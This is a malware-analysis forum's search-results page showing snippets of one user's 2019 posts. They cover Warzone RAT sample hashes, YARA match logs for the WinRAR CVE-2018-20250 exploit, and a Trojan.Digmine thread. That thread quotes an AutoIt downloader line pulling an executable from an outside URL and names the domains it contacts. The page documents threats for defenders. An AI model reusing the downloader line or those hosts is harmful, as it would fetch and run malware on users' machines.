A forum for reverse engineering, OS internals and malware analysis 

Search found 1626 matches

 Go to advanced search

VirusTotal graphs about malware

 by Xylitol ¦  Tue Jun 11, 2019 2:02 pm ¦  Forum: General Discussion ¦  Topic: VirusTotal graphs about malware ¦  Replies: 1 ¦  Views: 92

Hey there, i've been playing with VirusTotal graph since some weeks. Originally i did a graph just for building a landscape of files for ATM Wall, the graph can be seen here: https://www.virustotal.com/graph/embed/g9521270d163a4778aa5bc376c0d80375b11f2d95beee484498dbdaafc989ee5f I got the idea of do...

Re: User Protection FakeCog Request

 by Xylitol ¦  Sun Jun 02, 2019 11:08 am ¦  Forum: Completed Malware Requests ¦  Topic: User Protection FakeCog Request ¦  Replies: 2 ¦  Views: 280

FakeAVHunter wrote: Wed May 29, 2019 3:53 pm fakecog aka tdss
what?

Re: Warzone RAT

 by Xylitol ¦  Sat Jun 01, 2019 7:09 pm ¦  Forum: Malware ¦  Topic: Warzone RAT ¦  Replies: 3 ¦  Views: 798

no idea what the password no needs, customers are sharing with everyone already (: fews examples (rar archives, no password): 1347b7b6df132886b310072c2920a8ca0916cb2a22f06639f39d0c301f1bffdb - 1558641511831393750_WARZONE_RAT.rar 2c4822ecc9074acadaed523b9fee38f490f8093442a7cba9f3c24f075acd8c23 - WAR...

Re: CVE-2018-20250 (WinRAR UNACEV2.DLL)

 by Xylitol ¦  Fri May 31, 2019 10:03 pm ¦  Forum: Malware ¦  Topic: CVE-2018-20250 (WinRAR UNACEV2.DLL) ¦  Replies: 8 ¦  Views: 1446

Mai: ---------- MATCH: CVE_2018_20250 : AceArchive UNACEV2_DLL_EXP 2019-05-01: 9148d0c4bf8b4359cfe403bf3b2aa87a8f32bce80d0b31dcff164619fdad2cee free_pictures.ace 2019-05-02: 15d830d84a6d9f2b04c563a43e90f1bd01a6a175ffdf396ea854d1c7c56c5f6c test.rar 824ad4f2f36a8267b9c7a86b1ad825041539806d23b8a87662c0...

Re: CVE-2018-20250 (WinRAR UNACEV2.DLL)

 by Xylitol ¦  Wed May 01, 2019 7:36 pm ¦  Forum: Malware ¦  Topic: CVE-2018-20250 (WinRAR UNACEV2.DLL) ¦  Replies: 8 ¦  Views: 1446

April: ---------- MATCH: CVE_2018_20250 : AceArchive UNACEV2_DLL_EXP 2019-04-01: 6dffbbe53b14d9e9ef3b758a93244d268edb370f26b11434af0930e7ea0a98b1 test.rar 57511133930b64392eb093612c0fb707b37a7c8f9ea7f629ce138fa6eeb71911 file.rar a9e94c9d13c3aa6fb9ed9deddbf2007b43c07b68e951b4c38c10dad63bdac447 evil.r...

Re: Trojan.Digmine

 by Xylitol ¦  Tue Apr 30, 2019 3:43 am ¦  Forum: Malware ¦  Topic: Trojan.Digmine ¦  Replies: 4 ¦  Views: 2329

thx, I edited the thread title accordingly to Trendmicro detection. also here is another curiosity: dene.exe - 574ee5f6f38fe5b63eeb0d9bd8a7934027abf2a7b7000f79fba70e4526d94f17 - 951.0 KB Func download() Local $hdownload = InetGet("http://letask.me/test.php", "sa.exe", $inet_forcereload, $inet_downlo...

Re: AutoIt downloader/miner

 by Xylitol ¦  Sun Apr 28, 2019 7:41 pm ¦  Forum: Malware ¦  Topic: Trojan.Digmine ¦  Replies: 4 ¦  Views: 2329

Another. 8b68940459c9d22ee049e77c8ed5db77ef799ab3dedd0e7b6f75e93c49e8eed1 - 992.0 KB AnyRun have a good one about it: https://any.run/report/365167731ed69d11c2db17310e5015fc07b9d44325bf797779cff36563d9f84c/2f301ccf-e54f-4a63-8cf7-b9b43cee2799 Calling: - susu.icu - luru.icu Same design of url shorten...

Trojan.Digmine

 by Xylitol ¦  Sun Apr 28, 2019 2:23 pm ¦  Forum: Malware ¦  Topic: Trojan.Digmine ¦  Replies: 4 ¦  Views: 2329

Saw it yesterday spreading on facebook groups with random name and packed into .bz archives. https://i.imgur.com/UsBaWK1.png I got 2 samples from that (they are in attachment): 8a9176fcd89930b93756d331186c6f9559bc673f2d168730c7e18f07882ed478 - 985.0 KB 8cb158ed001eded4d7a82847cb669b68da2fac74357aa97...

Re: CVE-2018-20250 (WinRAR UNACEV2.DLL)

 by Xylitol ¦  Mon Apr 01, 2019 1:27 am ¦  Forum: Malware ¦  Topic: CVE-2018-20250 (WinRAR UNACEV2.DLL) ¦  Replies: 8 ¦  Views: 1446

March: ---------- MATCH: CVE_2018_20250 : AceArchive UNACEV2_DLL_EXP 2019-03-31: ceeb05b114d99453df04bba0138c597f4a87b446a55baf20d9d5a3f121dc7090 SMASH_Fornite_Logs.rar 027ccb2e3874e05fbaf750b2253c4044100021741abc77f720804de4040fe3a3 sdhong_exe.rar acc5c5092e3f7f7967f1827434e4c738e867e476c9e4ea8afc1...

Re: CVE-2018-20250 (WinRAR UNACEV2.DLL)

 by Xylitol ¦  Tue Mar 19, 2019 4:36 am ¦  Forum: Malware ¦  Topic: CVE-2018-20250 (WinRAR UNACEV2.DLL) ¦  Replies: 8 ¦  Views: 1446

so far the rule works good. has been pulled also here https://github.com/Yara-Rules/rules/blob/master/CVE_Rules/CVE-2018-20250.yar ---------- MATCH: CVE_2018_20250 : AceArchive UNACEV2_DLL_EXP FILE >>>>> C:/SBOX/temp/ace/0312885f07b5a028e64c6a2a440a8584c67adf2c0986e99447328c4bede4e102 - wincon.exe -...

  • 1
  • 2
  • 3
  • 4
  • 5
  • 163